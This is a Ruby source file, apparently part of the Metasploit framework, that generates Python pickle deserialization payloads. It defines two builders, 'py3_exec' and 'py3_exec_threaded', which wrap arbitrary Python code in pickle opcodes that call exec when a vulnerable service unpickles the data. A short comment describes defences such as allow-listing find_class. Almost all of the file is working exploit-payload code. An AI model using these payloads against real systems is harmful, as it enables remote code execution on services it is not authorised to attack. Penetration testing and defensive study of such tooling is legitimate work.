# -*- coding: binary -*-
# Python deserialization Utility
module Msf
module Util
# Python deserialization class
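class PythonDeserialization
  # Builders for serialized Python object (pickle) streams, keyed by payload
  # name. Each builder takes the Python source to embed and returns the
  # stream as a String. More entries may be added here over time.
  # Payload source files are available in external/source/python_deserialization
  #
  # Both streams use the text protocol: a GLOBAL opcode ("c") naming
  # __builtin__ exec, the source as a UNICODE ("V") argument, and REDUCE ("R")
  # to make the call. That is why a service must not unpickle data it does not
  # control; where it has to, restricting Unpickler.find_class to an allow-list
  # rejects the GLOBAL lookup, and pickletools.dis lists the opcodes of a
  # captured stream without executing it.
  PAYLOADS = {
    # this payload will work with Python 3.x targets to execute Python code in place
    py3_exec: proc do |python_code|
      escaped = escape_python_code(python_code)
      %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
    end,
    # this payload will work with Python 3.x targets to execute Python code in a new thread
    py3_exec_threaded: proc do |python_code|
      escaped = escape_python_code(python_code)
      %|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
    end
  }

  # Build the named payload around the given Python source.
  #
  # @param payload_name [Symbol, String] one of {payload_names}
  # @param command [String, nil] Python source handed to the payload builder
  # @return [String] the serialized stream
  # @raise [ArgumentError] if the payload name is unknown (or cannot be turned
  #   into a Symbol), or if the builder needs source and command is nil
  def self.payload(payload_name, command = nil)
    # nil and other objects without #to_sym are reported as an unknown payload
    # instead of surfacing as NoMethodError.
    key = payload_name.respond_to?(:to_sym) ? payload_name.to_sym : nil
    builder = PAYLOADS.fetch(key) do
      raise ArgumentError, "#{payload_name} payload not found in payloads"
    end

    builder.call(command)
  end

  # @return [Array<Symbol>] the names accepted by {payload}
  def self.payload_names
    PAYLOADS.keys
  end

  # Escape the characters that cannot appear literally in a UNICODE ("V")
  # argument: the argument is terminated by a newline, and a backslash would
  # start an escape sequence. Backslash, LF and CR are written as \u00XX.
  #
  # @param python_code [String] Python source to embed
  # @return [String] the escaped source
  # @raise [ArgumentError] if python_code is nil (command defaults to nil in
  #   {payload}, and calling gsub on it used to raise NoMethodError)
  def self.escape_python_code(python_code)
    raise ArgumentError, 'python code is required for this payload' if python_code.nil?

    python_code.gsub(/[\\\n\r]/) { |char| format('\\u%04x', char.ord) }
  end
  private_class_method :escape_python_code
end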
end
end